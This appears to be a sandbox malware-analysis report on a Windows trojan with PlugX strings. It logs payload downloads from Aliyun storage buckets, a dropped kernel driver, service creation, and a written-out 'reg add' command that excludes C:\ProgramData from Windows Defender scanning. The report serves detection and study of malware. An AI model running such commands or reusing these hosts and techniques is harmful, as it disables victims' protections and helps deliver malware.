Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: jcoiw1.oss-cn-shanghai.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: cavuax.net

Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: 4fkch1.exe, 00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 1387457-38765948.15.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 1387457-38765948.15.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 1387457-38765948.15.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 1387457-38765948.15.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: 1387457-38765948.15.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 1387457-38765948.15.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1387457-38765948.15.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 1387457-38765948.15.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 1387457-38765948.15.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: 1387457-38765948.15.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: 1387457-38765948.15.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: 1387457-38765948.15.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: 1387457-38765948.15.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: 1387457-38765948.15.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: 1387457-38765948.15.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: cajXRH.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 1387457-38765948.15.exe, 00000000.00000003.2173635647.00000000004B5000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193117633.000000000050B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/
Source: 1387457-38765948.15.exe, 00000000.00000003.2173635647.00000000004B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2246122658-3693405117-2476756634-1002
Source: 1387457-38765948.15.exe, 00000000.00000003.2173562010.000000000050B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/.gif
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2173562010.000000000050B000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2173635647.0000000000490000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2232542893.000000000050B000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193117633.000000000050B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif
Source: 1387457-38765948.15.exe, 00000000.00000003.2173635647.0000000000490000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif.
Source: 1387457-38765948.15.exe, 00000000.00000003.2173635647.0000000000490000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifdns.aliyuncs.com.gds.alibabadns.comLMEM
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifhttps://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifht
Source: 1387457-38765948.15.exe, 00000000.00000003.2193117633.000000000050B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif
Source: 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif4
Source: 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifL
Source: 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifQ
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifl
Source: 1387457-38765948.15.exe, 00000000.00000003.2232542893.00000000004C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifQ
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2232542893.000000000050B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif(
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifD
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifQ
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifQL
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gifp
Source: 1387457-38765948.15.exe, 00000000.00000003.2173562010.000000000050B000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193117633.000000000050B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/p
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1387457-38765948.15.exe	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 1387457-38765948.15.exe	String found in binary or memory: https://yandex.com0

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 47.101.26.25:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49865 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 39.2.4fkch1.exe.3670000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 4.2.cajXRH.exe.2910000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: 4fkch1.exe PID: 2492, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_0000000140006C95 NtAllocateVirtualMemory,

4_2_0000000140006C95

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

4_2_0000000140001520

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_000000014000C3F0	4_2_000000014000C3F0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_000000014000CC00	4_2_000000014000CC00
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_0000000140001A30	4_2_0000000140001A30
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_000000014000C2A0	4_2_000000014000C2A0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00000001400022C0	4_2_00000001400022C0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00000001400110F0	4_2_00000001400110F0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_0000000140010CF0	4_2_0000000140010CF0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_0000000140009300	4_2_0000000140009300
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_000000014000BB70	4_2_000000014000BB70
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_0000000140003F80	4_2_0000000140003F80
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00000001400103D0	4_2_00000001400103D0
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00007FFE13210248	4_2_00007FFE13210248
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4_2_00007FFE1320A1B8	4_2_00007FFE1320A1B8
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Code function: 41_2_008A4AE2	41_2_008A4AE2

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\4fkch1\4fkch1.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: 1387457-38765948.15.exe

Static PE information: invalid certificate

Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000000.1724214058.0000000141D76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.2232515846.000000001343C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe	Binary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 39.2.4fkch1.exe.3670000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 4.2.cajXRH.exe.2910000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: 4fkch1.exe PID: 2492, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@66/29@15/3

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

4_2_0000000140003F80

Source: C:\Users\user\Documents\cajXRH.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

4_2_0000000140001430

Source: C:\Users\user\Documents\cajXRH.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\cajXRH.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\cajXRH.exe

File created: C:\Program Files (x86)\4fkch1

Jump to behavior

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Jump to behavior

